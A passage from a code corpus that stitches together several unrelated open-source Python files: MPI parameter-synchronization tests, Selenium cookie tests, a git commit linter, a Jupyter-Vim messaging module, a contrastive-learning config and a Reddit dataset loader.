pc.whatever = 33
self.assertEqual(["serialNum"], pc.keys())
pc.p0 = "hi"
self.assertEqual({"p0", "serialNum"}, set(pc.keys()))
# Also make sure that subclasses of ParameterCollection subclasses use __slots__
class MockPCChild(MockPC):
pDefs = parameters.ParameterDefinitionCollection()
with pDefs.createBuilder() as pb:
pb.defParam("p2", "foo", "bar")
pcc = MockPCChild()
with self.assertRaises(AssertionError):
pcc.whatever = 33
class MockSyncPC(parameters.ParameterCollection):
pDefs = parameters.ParameterDefinitionCollection()
with pDefs.createBuilder(
default=0.0, location=parameters.ParamLocation.AVERAGE
) as pb:
pb.defParam("param1", "units", "p1 description", categories=["cat1"])
pb.defParam("param2", "units", "p2 description", categories=["cat2"])
pb.defParam("param3", "units", "p3 description", categories=["cat3"])
def makeComp(name):
c = composites.Composite(name)
c.p = MockSyncPC()
return c
class SynchronizationTests:
"""Some unit tests that must be run with mpirun instead of the standard unittest system."""
def setUp(self):
self.r = makeComp("reactor")
self.r.core = makeComp("core")
self.r.add(self.r.core)
for ai in range(armi.MPI_SIZE * 4):
a = makeComp("assembly{}".format(ai))
self.r.core.add(a)
for bi in range(10):
a.add(makeComp("block{}-{}".format(ai, bi)))
self.comps = [self.r.core] + self.r.core.getChildren(deep=True)
for pd in MockSyncPC().paramDefs:
pd.assigned = parameters.NEVER
def tearDown(self):
del self.r
def run(self, testNamePrefix="mpitest_"):
with open("mpitest{}.temp".format(armi.MPI_RANK), "w") as self.l:
for methodName in sorted(dir(self)):
if methodName.startswith(testNamePrefix):
self.write("{}.{}".format(self.__class__.__name__, methodName))
try:
self.setUp()
getattr(self, methodName)()
except Exception:
self.write("failed, big time")
traceback.print_exc(file=self.l)
self.write("*** printed exception")
try:
self.tearDown()
except:
pass
self.l.write("done.")
def write(self, msg):
self.l.write("{}\n".format(msg))
self.l.flush()
def assertRaises(self, exceptionType):
class ExceptionCatcher:
def __enter__(self):
pass
def __exit__(self, exc_type, exc_value, traceback):
if exc_type is exceptionType:
return True
raise AssertionError(
"Expected {}, but got {}".format(exceptionType, exc_type)
)
return ExceptionCatcher()
def assertEqual(self, expected, actual):
if expected != actual:
raise AssertionError(
"(expected) {} != {} (actual)".format(expected, actual)
)
def assertNotEqual(self, expected, actual):
if expected == actual:
raise AssertionError(
"(expected) {} == {} (actual)".format(expected, actual)
)
def mpitest_noConflicts(self):
for ci, comp in enumerate(self.comps):
if ci % armi.MPI_SIZE == armi.MPI_RANK:
comp.p.param1 = (armi.MPI_RANK + 1) * 30.0
else:
self.assertNotEqual((armi.MPI_RANK + 1) * 30.0, comp.p.param1)
# numUpdates = len(self.comps) // armi.MPI_SIZE + (len(self.comps) % armi.MPI_SIZE > armi.MPI_RANK)
self.assertEqual(len(self.comps), self.r.syncMpiState())
for ci, comp in enumerate(self.comps):
self.assertEqual((ci % armi.MPI_SIZE + 1) * 30.0, comp.p.param1)
def mpitest_noConflicts_setByString(self):
"""Make sure params set by string also work with sync."""
for ci, comp in enumerate(self.comps):
if ci % armi.MPI_SIZE == armi.MPI_RANK:
comp.p.param2 = (armi.MPI_RANK + 1) * 30.0
else:
self.assertNotEqual((armi.MPI_RANK + 1) * 30.0, comp.p.param2)
# numUpdates = len(self.comps) // armi.MPI_SIZE + (len(self.comps) % armi.MPI_SIZE > armi.MPI_RANK)
self.assertEqual(len(self.comps), self.r.syncMpiState())
for ci, comp in enumerate(self.comps):
self.assertEqual((ci % armi.MPI_SIZE + 1) * 30.0, comp.p.param2)
def mpitest_withConflicts(self):
self.r.core.p.param1 = (armi.MPI_RANK + 1) * 99.0
with self.assertRaises(ValueError):
self.r.syncMpiState()
def mpitest_withConflictsButSameValue(self):
self.r.core.p.param1 = (armi.MPI_SIZE + 1) * 99.0
self.r.syncMpiState()
self.assertEqual((armi.MPI_SIZE + 1) * 99.0, self.r.core.p.param1)
def mpitest_noConflictsMaintainWithStateRetainer(self):
assigned = []
with self.r.retainState(parameters.inCategory("cat1")):
for ci, comp in enumerate(self.comps):
comp.p.param2 = 99 * ci
if ci % armi.MPI_SIZE == armi.MPI_RANK:
comp.p.param1 = (armi.MPI_RANK + 1) * 30.0
assigned.append(parameters.SINCE_ANYTHING)
else:
self.assertNotEqual((armi.MPI_RANK + 1) * 30.0, comp.p.param1)
assigned.append(parameters.NEVER)
# 1st inside state retainer
self.assertEqual(
True, all(c.p.assigned == parameters.SINCE_ANYTHING for c in self.comps)
)
# confirm outside state retainer
self.assertEqual(assigned, [c.p.assigned for ci, c in enumerate(self.comps)])
# this rank's "assigned" components are not assigned on the workers, and so will be updated
self.assertEqual(len(self.comps), self.r.syncMpiState())
for ci, comp in enumerate(self.comps):
self.assertEqual((ci % armi.MPI_SIZE + 1) * 30.0, comp.p.param1)
def mpitest_conflictsMaintainWithStateRetainer(self):
with self.r.retainState(parameters.inCategory("cat2")):
for _, comp in enumerate(self.comps):
comp.p.param2 = 99 * armi.MPI_RANK
with self.assertRaises(ValueError):
self.r.syncMpiState()
def mpitest_rxCoeffsProcess(self):
"""This test mimics the process for rxCoeffs when doing distributed doppler"""
def do():
# we will do this over 4 passes (there are 4 * MPI_SIZE assemblies)
for passNum in range(4):
with self.r.retainState(parameters.inCategory("cat2")):
self.r.p.param3 = "hi"
for c in self.comps:
c.p.param1 = (
99 * armi.MPI_RANK
) # this will get reset after state retainer
a = self.r.core[passNum * armi.MPI_SIZE + armi.MPI_RANK]
a.p.param2 = armi.MPI_RANK * 20.0
for b in a:
b.p.param2 = armi.MPI_RANK * 10.0
for ai, a2 in enumerate(self.r):
if ai % armi.MPI_SIZE != armi.MPI_RANK:
assert "param2" not in a2.p
self.assertEqual(parameters.SINCE_ANYTHING, param1.assigned)
self.assertEqual(parameters.SINCE_ANYTHING, param2.assigned)
self.assertEqual(parameters.SINCE_ANYTHING, param3.assigned)
self.assertEqual(parameters.SINCE_ANYTHING, a.p.assigned)
self.r.syncMpiState()
self.assertEqual(
parameters.SINCE_ANYTHING
& ~parameters.SINCE_LAST_DISTRIBUTE_STATE,
param1.assigned,
)
self.assertEqual(
parameters.SINCE_ANYTHING
& ~parameters.SINCE_LAST_DISTRIBUTE_STATE,
param2.assigned,
)
self.assertEqual(
parameters.SINCE_ANYTHING
& ~parameters.SINCE_LAST_DISTRIBUTE_STATE,
param3.assigned,
)
self.assertEqual(
parameters.SINCE_ANYTHING
& ~parameters.SINCE_LAST_DISTRIBUTE_STATE,
a.p.assigned,
)
self.assertEqual(parameters.NEVER, param1.assigned)
self.assertEqual(parameters.SINCE_ANYTHING, param2.assigned)
self.assertEqual(parameters.NEVER, param3.assigned)
self.assertEqual(parameters.SINCE_ANYTHING, a.p.assigned)
do_assert(passNum)
param1 = self.r.p.paramDefs["param1"]
param2 = self.r.p.paramDefs["param2"]
param3 = self.r.p.paramDefs["param3"]
def do_assert(passNum):
# ensure all assemblies and blocks set values for param2, but param1 is empty
for rank in range(armi.MPI_SIZE):
a = self.r.core[passNum * armi.MPI_SIZE + rank]
assert "param1" not in a.p
assert "param3" not in a.p
self.assertEqual(rank * 20, a.p.param2)
for b in a:
self.assertEqual(rank * 10, b.p.param2)
assert "param1" not in b.p
assert "param3" not in b.p
if armi.MPI_RANK == 0:
with self.r.retainState(parameters.inCategory("cat2")):
armi.MPI_COMM.bcast(self.r)
do()
[do_assert(passNum) for passNum in range(4)]
[do_assert(passNum) for passNum in range(4)]
else:
del self.r
self.r = armi.MPI_COMM.bcast(None)
do()
if __name__ == "__main__":
if armi.MPI_SIZE == 1:
unittest.main()
else:
SynchronizationTests().run()
|
py/test/selenium/webdriver/common/cookie_tests.py | vinay-qa/vinayit-android-server-apk | 2,151 | 12738849 | <filename>py/test/selenium/webdriver/common/cookie_tests.py<gh_stars>1000+
import calendar
import time
import unittest
import random
import pytest
from selenium.test.selenium.webdriver.common import utils
class CookieTest(unittest.TestCase):
def setUp(self):
self._loadPage("simpleTest")
# Set the cookie to expire in 30 minutes
timestamp = calendar.timegm(time.gmtime()) + (30 * 60)
self.COOKIE_A = {"name": "foo",
"value": "bar",
"path": "/",
"secure": False}
def tearDown(self):
self.driver.delete_all_cookies()
def testAddCookie(self):
self.driver.execute_script("return document.cookie")
self.driver.add_cookie(self.COOKIE_A)
cookie_returned = str(self.driver.execute_script("return document.cookie"))
self.assertTrue(self.COOKIE_A["name"] in cookie_returned)
def testAddingACookieThatExpiredInThePast(self):
if self.driver.name == 'internet explorer':
pytest.skip("Issue needs investigating")
cookie = self.COOKIE_A.copy()
cookie["expiry"] = calendar.timegm(time.gmtime()) - 1
self.driver.add_cookie(cookie)
cookies = self.driver.get_cookies()
self.assertEquals(0, len(cookies))
def testDeleteAllCookie(self):
self.driver.add_cookie(utils.convert_cookie_to_json(self.COOKIE_A))
self.driver.delete_all_cookies()
self.assertFalse(self.driver.get_cookies())
def testDeleteCookie(self):
self.driver.add_cookie(utils.convert_cookie_to_json(self.COOKIE_A))
self.driver.delete_cookie("foo")
self.assertFalse(self.driver.get_cookies())
def testShouldGetCookieByName(self):
key = "key_%d" % int(random.random()*10000000)
self.driver.execute_script("document.cookie = arguments[0] + '=set';", key)
cookie = self.driver.get_cookie(key)
self.assertEquals("set", cookie["value"])
def testGetAllCookies(self):
key1 = "key_%d" % int(random.random()*10000000)
key2 = "key_%d" % int(random.random()*10000000)
cookies = self.driver.get_cookies()
count = len(cookies)
one = {"name" :key1,
"value": "value"}
two = {"name":key2,
"value": "value"}
self.driver.add_cookie(one)
self.driver.add_cookie(two)
self._loadPage("simpleTest")
cookies = self.driver.get_cookies()
self.assertEquals(count + 2, len(cookies))
def testShouldNotDeleteCookiesWithASimilarName(self):
cookieOneName = "fish"
cookie1 = {"name" :cookieOneName,
"value":"cod"}
cookie2 = {"name" :cookieOneName + "x",
"value": "earth"}
self.driver.add_cookie(cookie1)
self.driver.add_cookie(cookie2)
self.driver.delete_cookie(cookieOneName)
cookies = self.driver.get_cookies()
self.assertFalse(cookie1["name"] == cookies[0]["name"], msg=str(cookies))
self.assertEquals(cookie2["name"] , cookies[0]["name"], msg=str(cookies))
def _loadPage(self, name):
self.driver.get(self._pageURL(name))
def _pageURL(self, name):
return "http://localhost:%d/%s.html" % (self.webserver.port, name)
|
util/lint_commits.py | asb/opentitan | 1,375 | 12738856 | <gh_stars>1000+
#!/usr/bin/env python3
# Copyright lowRISC contributors.
# Licensed under the Apache License, Version 2.0, see LICENSE for details.
# SPDX-License-Identifier: Apache-2.0
import argparse
import re
import sys
from git import Repo
error_msg_prefix = 'ERROR: '
warning_msg_prefix = 'WARNING: '
# Maximum length of the summary line in the commit message (the first line)
# There is no hard limit, but a typical convention is to keep this line at or
# below 50 characters, with occasional outliers.
COMMIT_MSG_MAX_SUMMARY_LEN = 100
def error(msg, commit=None):
full_msg = msg
if commit:
full_msg = "Commit %s: %s" % (commit.hexsha, msg)
print(error_msg_prefix + full_msg, file=sys.stderr)
def warning(msg, commit=None):
full_msg = msg
if commit:
full_msg = "Commit %s: %s" % (commit.hexsha, msg)
print(warning_msg_prefix + full_msg, file=sys.stderr)
def lint_commit_author(commit):
success = True
if commit.author.email.endswith('users.noreply.github.com'):
error(
f'Commit author has no valid email address set: '
'{commit.author.email!r}. '
'Use "git config user.email <EMAIL>" to '
'set a valid email address, then update the commit '
'with "git rebase -i" and/or '
'"git commit --amend --signoff --reset-author". '
'Also check your GitHub settings at '
'https://github.com/settings/emails: your email address '
'must be verified, and the option "Keep my email address '
'private" must be disabled. '
'This command will also sign off your commit indicating agreement '
'to the Contributor License Agreement. See CONTRIBUTING.md for '
'more details.', commit)
success = False
if ' ' not in commit.author.name:
warning(
f'The commit author name {commit.author.name!r} contains no space. '
'Use "git config user.name \'<NAME>\'" to '
'set your real name, and update the commit with "git rebase -i " '
'and/or "git commit --amend --signoff --reset-author". '
'This command will also sign off your commit indicating agreement '
'to the Contributor License Agreement. See CONTRIBUTING.md for '
'more details.', commit)
# A warning doesn't fail lint.
return success
def lint_commit_message(commit):
success = True
lines = commit.message.splitlines()
# Check length of summary line.
summary_line_len = len(lines[0])
if summary_line_len > COMMIT_MSG_MAX_SUMMARY_LEN:
error(
"The summary line in the commit message is %d characters long; "
"only %d characters are allowed." %
(summary_line_len, COMMIT_MSG_MAX_SUMMARY_LEN), commit)
success = False
# Check for an empty line separating the summary line from the long
# description.
if len(lines) > 1 and lines[1] != "":
error(
"The second line of a commit message must be empty, as it "
"separates the summary from the long description.", commit)
success = False
# Check that the commit message contains at least one Signed-off-by line
# that matches the author name and email. There might be other signoffs (if
# there are multiple authors). We don't have any requirements about those
# at the moment and just pass them through.
signoff_lines = []
signoff_pfx = 'Signed-off-by: '
for idx, line in enumerate(lines):
if not line.startswith(signoff_pfx):
continue
signoff_body = line[len(signoff_pfx):]
match = re.match(r'[^<]+ <[^>]*>$', signoff_body)
if match is None:
error('Commit has Signed-off-by line {!r}, but the second part '
'is not of the required form. It should be of the form '
'"Signed-off-by: NAME <EMAIL>".'
.format(line))
success = False
signoff_lines.append(line)
expected_signoff_line = ("Signed-off-by: {} <{}>"
.format(commit.author.name,
commit.author.email))
signoff_req_msg = ('The commit message must contain a Signed-off-by line '
'that matches the commit author name and email, '
'indicating agreement to the Contributor License '
'Agreement. See CONTRIBUTING.md for more details. '
'You can use "git commit --signoff" to ask git to add '
'this line for you.')
if not signoff_lines:
error('Commit has no Signed-off-by line. ' + signoff_req_msg)
success = False
elif expected_signoff_line not in signoff_lines:
error(('Commit has one or more Signed-off-by lines, but not the one '
'we expect. We expected to find "{}". '
.format(expected_signoff_line)) +
signoff_req_msg)
success = False
return success
def lint_commit(commit):
success = True
if not lint_commit_author(commit):
success = False
if not lint_commit_message(commit):
success = False
return success
def main():
global error_msg_prefix
global warning_msg_prefix
parser = argparse.ArgumentParser(
description='Check commit metadata for common mistakes')
parser.add_argument('--error-msg-prefix',
default=error_msg_prefix,
required=False,
help='string to prepend to all error messages')
parser.add_argument('--warning-msg-prefix',
default=warning_msg_prefix,
required=False,
help='string to prepend to all warning messages')
parser.add_argument('--no-merges',
required=False,
action="store_true",
help='do not check commits with more than one parent')
parser.add_argument('commit_range',
metavar='commit-range',
help=('commit range to check '
'(must be understood by git log)'))
args = parser.parse_args()
error_msg_prefix = args.error_msg_prefix
warning_msg_prefix = args.warning_msg_prefix
lint_successful = True
repo = Repo()
commits = repo.iter_commits(args.commit_range)
for commit in commits:
print("Checking commit %s" % commit.hexsha)
is_merge = len(commit.parents) > 1
if is_merge and args.no_merges:
print("Skipping merge commit.")
continue
if not lint_commit(commit):
lint_successful = False
if not lint_successful:
error('Commit lint failed.')
sys.exit(1)
if __name__ == '__main__':
main()
|
pythonx/message_parser.py | matbb/jupyter-vim | 187 | 12738868 | """
Jupyter <-> Vim
See: <http://jupyter-client.readthedocs.io/en/stable/api/client.html>
"""
# Standard
import re
from textwrap import dedent
from threading import Thread, Lock
from time import sleep
# Py module
from jupyter_client import KernelManager
import vim
# Local
from jupyter_util import echom, unquote_string, match_kernel_id, get_vim
try:
from queue import Queue, Empty
except ImportError:
from Queue import Queue, Empty
# Local
from language import list_languages
class VimMessenger():
"""Handle message to/from Vim
Attributes
----------
sync : :obj:`Sync`
Object to support asynchronous operations.
message_queue : :obj:`Queue`
Asynchronous queue of messages.
pid : int
PID of the current vim session.
verbose : bool
If True, receive message id from sending function and report back to
vim with output, silent otherwise.
monitor_console : bool
If True, create a new buffer in vim to display output from the kernel.
cell_separators : list of str
User-defined list of strings that separate code cells.
"""
def __init__(self, sync):
self.sync = sync
self.message_queue = Queue() # for async echom
self.pid = get_vim('getpid()', -1) # pid of current vim session
# Define members python <- vim
self.set_monitor_bools()
self.set_cell_separators()
def set_monitor_bools(self):
"""Set booleans to define if jupyter_vim monitors messages."""
# NOTE this function is called by the @monitor_decorator in jupyter_vim
# to ensure user options are up-to-date.
self.verbose = bool(int(vim.vars.get('jupyter_verbose', 0)))
self.monitor_console = bool(int(vim.vars.get('jupyter_monitor_console', 0)))
def set_cell_separators(self):
"""Set cell separators (list of str)."""
# NOTE this function is called from jupyter_vim.run_cell
self.cell_separators = get_vim('g:jupyter_cell_separators', '')
self.cell_separators = [unquote_string(x) for x in self.cell_separators]
@staticmethod
def get_timer_intervals():
"""Return list of user-defined timers [ms].
Returns
-------
list of int
List of timers [ms].
"""
timer_list = get_vim('g:jupyter_timer_intervals', [0.1, 0.5, 1, 3])
return [int(x) for x in timer_list]
@staticmethod
def get_meta_messages():
"""Return list of user-defined list of meta messages.
Returns
-------
list of str
List of user-defined meta messages to send before/after code.
"""
return (get_vim('b:jupyter_exec_before', ''),
get_vim('b:jupyter_exec_pre', ''),
get_vim('b:jupyter_exex_post', ''),
get_vim('b:jupyter_exec_after', '')
)
def is_cell_separator(self, line):
"""Return True if given `line` is a cell separator."""
return any([bool(re.match(separation, line.strip()))
for separation in self.cell_separators])
def thread_echom(self, arg, **args):
"""Wrap echo async: put message to be echoed in a queue."""
self.message_queue.put((arg, args))
def timer_echom(self):
"""Call echom sync on all messages in queue."""
# Check in
if self.message_queue.empty():
return
# Show user the force
while not self.message_queue.empty():
(arg, args) = self.message_queue.get_nowait()
echom(arg, **args)
# Restore peace in the galaxy
vim.command('redraw')
# TODO add verbose flag
def string_hi(self):
"""Return Hi from vim string."""
return ('\\n\\nReceived connection from vim client with pid {}'
'\\n' + '-' * 60 + '\\n').format(self.pid)
def thread_echom_kernel_info(self, kernel_info):
"""Echo kernel info (async).
Parameters
----------
kernel_info : str
Information about the kernel to print in vim messages.
"""
kernel_string = '\n '.join([str(key) + ': ' + str(kernel_info[key])
for key in kernel_info])
# Send command so that user knows vim is connected at bottom, more readable
self.thread_echom('Connected: {}'.format(kernel_info['id']), style='Question')
# FIXME messages does not actually display in vim,
# only appears in `:messages` command.
self.thread_echom('To:', style='Question')
self.thread_echom(kernel_string)
class JupyterMessenger():
"""Handle primitive messages to/from jupyter kernel.
Attributes
----------
km_client : :obj:`KernelManager` client
Object to handle connections with the kernel.
See: <http://jupyter-client.readthedocs.io/en/stable/api/client.html>
kernel_info : dict
Information about the kernel itself.
dict with keys:
'kernel_type' : str, the type of kernel, i.e. `python`.
'pid' : int, the pid of the kernel process.
'cwd' : str, the current working directory of the kernel.
'hostname' : str, the hostname of the kernel.
cfile : str
Filename of the connection file, i.e. `kernel-123.json`.
sync : :obj:`Sync`
Object to support asynchronous operations.
meta_messages : list of str
User-defined meta messages to send before/after code.
"""
def __init__(self, sync):
self.km_client = None # KernelManager client
self.kernel_info = dict() # Kernel information
self.cfile = '' # Connection file
self.sync = sync # Sync object
self.meta_messages = VimMessenger.get_meta_messages()
def create_kernel_manager(self):
"""Create the kernel manager and connect a client.
Returns
-------
bool
True if client connects successfully, False on failure.
"""
# Get client
kernel_manager = KernelManager(connection_file=self.cfile)
# The json may be badly encoding especially if autoconnecting
try:
kernel_manager.load_connection_file()
except Exception:
return False
self.km_client = kernel_manager.client()
# Open channel
self.km_client.start_channels()
# Ping the kernel
self.km_client.kernel_info()
try:
self.km_client.get_shell_msg(timeout=1)
return True
except Empty:
return False
def disconnnect(self):
"""Disconnect silently from kernel and close channels."""
if self.km_client is None:
return
self.km_client.stop_channels()
self.km_client = None
def update_meta_messages(self):
"""Sync: reread vim meta vars."""
self.meta_messages = VimMessenger.get_meta_messages()
def check_connection(self):
"""Check that we have a client connected to the kernel.
Returns
-------
bool
True if client is connected, False if not.
"""
return self.km_client.hb_channel.is_beating() if self.km_client else False
def check_connection_or_warn(self):
"""Echo warning if not connected.
Returns
-------
bool
True if client is connected, False if not.
"""
if self.check_connection():
return True
echom('WARNING: Not connected to Jupyter!'
'\nRun :JupyterConnect to find the kernel', style='WarningMsg')
return False
def get_pending_msgs(self):
"""Get pending message pool.
Returns
-------
list of :obj:`msg`
List of messages waiting on the `iopub_channel`.
"""
msgs = list()
try:
self.sync.msg_lock.acquire()
msgs = self.km_client.iopub_channel.get_msgs()
except (Empty, TypeError, KeyError, IndexError, ValueError):
pass
finally:
self.sync.msg_lock.release()
return msgs
def get_reply_msg(self, msg_id):
"""Get kernel reply from sent client message with msg_id (async).
This function can block 3 sec, so call in a thread.
Returns
-------
dict
Message response.
"""
# TODO handle 'is_complete' requests?
# <http://jupyter-client.readthedocs.io/en/stable/messaging.html#code-completeness>
# Declare default
reply = dict()
for _ in range(3):
# Check
if self.sync.stop:
return dict()
# Get
self.sync.msg_lock.acquire()
try:
reply = self.km_client.get_shell_msg(block=True, timeout=1) or {}
except (Empty, TypeError, KeyError, IndexError, ValueError):
pass
finally:
self.sync.msg_lock.release()
# Stop
if reply.get('parent_header', {}).get('msg_id', -1) == msg_id:
break
return reply
def send(self, msg, ismeta=False, **kwargs):
"""Send a message to the kernel client.
.. note:: Async: crossroad <- run_command
Global: -> cmd, cmd_id
Returns
-------
int
Command id.
"""
if not self.check_connection_or_warn():
return -1
# Pre
if not ismeta:
bef, pre, post, aft = self.meta_messages
# Send before unless it is blank
if bef:
self.send(bef, ismeta=True)
# Craft new message
msg = pre + msg + post
# Include dedent of msg so we don't get odd indentation errors.
cmd = dedent(msg)
# Actually send execute_request
cmd_id = self.km_client.execute(cmd, **kwargs)
# Send after unless it is blank
if not ismeta and aft:
self.send(aft, ismeta=True)
return cmd_id
def get_kernel_info(self, language):
"""Explicitly ask the jupyter kernel for its pid
.. note:: Thread: <- cfile
<- vim_pid
-> lang
-> kernel_pid
Returns
-------
dict
dict with keys: {'kernel_type', 'pid', 'cwd', 'hostname'}
"""
# Check in
if self.kernel_info['kernel_type'] not in list_languages():
echom('I don''t know how to get infos for a Jupyter kernel of type "{}"'
.format(self.kernel_info['kernel_type']), 'WarningMsg')
# Fill kernel_info
self.kernel_info.update({
'connection_file': self.cfile,
'id': match_kernel_id(self.cfile), # int id of cfile
# Get from kernel info
'pid': self.send_code_and_get_reply(language.pid), # PID of kernel
'cwd': self.send_code_and_get_reply(language.cwd),
'hostname': self.send_code_and_get_reply(language.hostname),
})
# Return
return self.kernel_info
def send_code_and_get_reply(self, code):
"""Get variable _res from code string.
.. note:: Only used by get_kernel_info (internal) => send with ismeta.
Returns
-------
str
Unquoted string of the message reply.
"""
# Send message
msg_id = self.send(code, ismeta=True, silent=True, user_expressions={'_res': '_res'})
# Wait to get message back from kernel (1 sec)
reply = self.get_reply_msg(msg_id)
# Get _res from user expression
res = reply.get('content', {}).get('user_expressions', {}) \
.get('_res', {}).get('data', {}).get('text/plain', -1)
# Try again parse messages
if res == -1:
line_number = reply.get('content', {}).get('execution_count', -1)
msgs = self.get_pending_msgs()
res = parse_iopub_for_reply(msgs, line_number)
# Rest in peace
return unquote_string(res)
class Sync():
"""Synchronization (not so) primitives, for safe thread support.
Attributes
----------
thread : :obj:`Thread` or None
The running thread.
stop : bool
True if thread should not be stopped, False otherwise.
line_queue : :obj:`Queue`
Queue of lines of code to echo to the kernel.
msg_lock : :obj:`Lock`
lock to retrieve messages one thread at a time.
"""
def __init__(self):
self.thread = None
self.stop = False
self.line_queue = Queue()
self.msg_lock = Lock()
def check_stop(self):
"""Check and reset stop value.
Returns
-------
bool
Last value of `self.stop`.
"""
last = self.stop
if self.stop:
self.stop = False
return last
def stop_thread(self):
"""Stop current thread."""
if self.thread is None:
return
if not self.thread.is_alive():
self.thread = None
return
# Wait 1 sec max
self.stop = True
for _ in range(100):
if not self.stop:
sleep(0.010)
self.thread = None
return
def start_thread(self, target=None, args=None):
"""Stop last / Create new / Start thread.
Parameters
----------
target : callable, optional, default=None
Callable object to which `args` will be passed.
args : list, optional, default=None
"""
if args is None:
args = list()
self.stop_thread()
self.thread = Thread(target=target, args=args, daemon=True)
self.thread.start()
# -----------------------------------------------------------------------------
# Parsers
# -----------------------------------------------------------------------------
def parse_iopub_for_reply(msgs, line_number):
"""Get kernel response from message pool (Async).
.. note:: some kernel (iperl) do not discriminate when client asks for
`user_expressions`. But still they give a printable output.
Parameters
----------
msgs : list
List of messages to parse.
line_number : int
The message number of the corresponding code.
Returns
-------
str
The kernel response to the messages.
"""
res = -1
# Parse all execute
for msg in msgs:
# Get the result of execution
content = msg.get('content', False)
if not content:
continue
ec = int(content.get('execution_count', 0))
if not ec:
continue
if line_number not in (-1, ec):
continue
msg_type = msg.get('header', {}).get('msg_type', '')
if msg_type not in ('execute_result', 'stream'):
continue
res = content.get('data', {}).get('text/plain', -1)
res = res if res != -1 else content.get('text', -1)
break
return res
|
configs/small/cifar10/moco_ccrop.py | xyupeng/ContrastiveCrop | 148 | 12738898 | # python DDP_moco_ccrop.py path/to/this/config
# model
dim = 128
model = dict(type='ResNet', depth=18, num_classes=dim, maxpool=False)
moco = dict(dim=dim, K=65536, m=0.999, T=0.20, mlp=True)
loss = dict(type='CrossEntropyLoss')
# data
root = '/path/to/your/dataset'
mean = (0.4914, 0.4822, 0.4465)
std = (0.2023, 0.1994, 0.2010)
batch_size = 512
num_workers = 4
data = dict(
train=dict(
ds_dict=dict(
type='CIFAR10_boxes',
root=root,
train=True,
),
rcrop_dict=dict(
type='cifar_train_rcrop',
mean=mean, std=std
),
ccrop_dict=dict(
type='cifar_train_ccrop',
alpha=0.1,
mean=mean, std=std
),
),
eval_train=dict(
ds_dict=dict(
type='CIFAR10',
root=root,
train=True,
),
trans_dict=dict(
type='cifar_test',
mean=mean, std=std
),
),
)
# boxes
warmup_epochs = 100
loc_interval = 100
box_thresh = 0.10
# training optimizer & scheduler
epochs = 500
lr = 0.5
optimizer = dict(type='SGD', lr=lr, momentum=0.9, weight_decay=1e-4)
lr_cfg = dict( # passed to adjust_learning_rate(cfg=lr_cfg)
type='Cosine',
steps=epochs,
lr=lr,
decay_rate=0.1,
# decay_steps=[100, 150]
warmup_steps=0,
# warmup_from=0.01
)
# log & save
log_interval = 20
save_interval = 250
work_dir = None # rewritten by args
resume = None
load = None
port = 10001
|
datasets/reddit/reddit.py | dkajtoch/datasets | 10,608 | 12738902 | # coding=utf-8
# Copyright 2020 The TensorFlow Datasets Authors and the HuggingFace Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Reddit dataset using tldr as summaries."""
import json
import os
import datasets
_CITATION = """
@inproceedings{volske-etal-2017-tl,
title = {TL;DR: Mining {R}eddit to Learn Automatic Summarization},
author = {<NAME> and <NAME> and <NAME> and <NAME>},
booktitle = {Proceedings of the Workshop on New Frontiers in Summarization},
month = {sep},
year = {2017},
address = {Copenhagen, Denmark},
publisher = {Association for Computational Linguistics},
url = {https://www.aclweb.org/anthology/W17-4508},
doi = {10.18653/v1/W17-4508},
pages = {59--63},
abstract = {Recent advances in automatic text summarization have used deep neural networks to generate high-quality abstractive summaries, but the performance of these models strongly depends on large amounts of suitable training data. We propose a new method for mining social media for author-provided summaries, taking advantage of the common practice of appending a {``}TL;DR{''} to long posts. A case study using a large Reddit crawl yields the Webis-TLDR-17 dataset, complementing existing corpora primarily from the news genre. Our technique is likely applicable to other social media sites and general web crawls.},
}
"""
_DESCRIPTION = """
This corpus contains preprocessed posts from the Reddit dataset.
The dataset consists of 3,848,330 posts with an average length of 270 words for content,
and 28 words for the summary.
Features includes strings: author, body, normalizedBody, content, summary, subreddit, subreddit_id.
Content is used as document and summary is used as summary.
"""
_URL = "https://zenodo.org/record/1043504/files/corpus-webis-tldr-17.zip?download=1"
_DOCUMENT = "content"
_SUMMARY = "summary"
_ADDITIONAL_FEATURES = ["author", "body", "normalizedBody", "subreddit", "subreddit_id", "id"]
class Reddit(datasets.GeneratorBasedBuilder):
"""Reddit Dataset."""
VERSION = datasets.Version("1.0.0")
def _info(self):
return datasets.DatasetInfo(
description=_DESCRIPTION,
features=datasets.Features(
{k: datasets.Value("string") for k in _ADDITIONAL_FEATURES + [_DOCUMENT, _SUMMARY]}
),
supervised_keys=None,
homepage="https://github.com/webis-de/webis-tldr-17-corpus",
citation=_CITATION,
)
def _split_generators(self, dl_manager):
"""Returns SplitGenerators."""
dl_path = dl_manager.download_and_extract(_URL)
return [
datasets.SplitGenerator(
name=datasets.Split.TRAIN,
gen_kwargs={"path": os.path.join(dl_path, "corpus-webis-tldr-17.json")},
)
]
def _generate_examples(self, path=None):
"""Yields examples."""
with open(path, "rb") as f:
for i, line in enumerate(f):
# possible keys are:
# author: string (nullable = true)
# body: string (nullable = true)
# normalizedBody: string (nullable = true)
# content: string (nullable = true)
# content_len: long (nullable = true)
# summary: string (nullable = true)
# summary_len: long (nullable = true)
# id: string (nullable = true)
# subreddit: string (nullable = true)
# subreddit_id: string (nullable = true)
# title: string (nullable = true)
d = json.loads(line)
if _SUMMARY in d and _DOCUMENT in d:
yield i, {k: d.get(k, "") for k in _ADDITIONAL_FEATURES + [_DOCUMENT, _SUMMARY]}
|
src/encoded/audit/formatter.py | procha2/encoded | 102 | 12738922 | import re
def audit_link(linkText, uri):
"""Generate link "markdown" from URI."""
return '{{{}|{}}}'.format(linkText, uri)
def path_to_text(path):
"""Convert object path to the text portion."""
accession = re.match(r'\/.*\/(.*)\/', path)
return accession.group(1) if accession else None
def space_in_words(objects_string):
"""Insert a space between objects that have more than one
capital letter eg. AntibodyChar --> Antibody Char"""
add_space = re.sub(r"(\w)([A-Z])", r"\1 \2", objects_string)
return add_space
|
bin/check_ext_deterministic.py | dendisuhubdy/attention-lvcsr | 295 | 12738934 | <reponame>dendisuhubdy/attention-lvcsr<gh_stars>100-1000
#!/usr/bin/env python
import argparse
import fst
import sys
def main(args):
L = fst.read(args.fst_file)
for state in L:
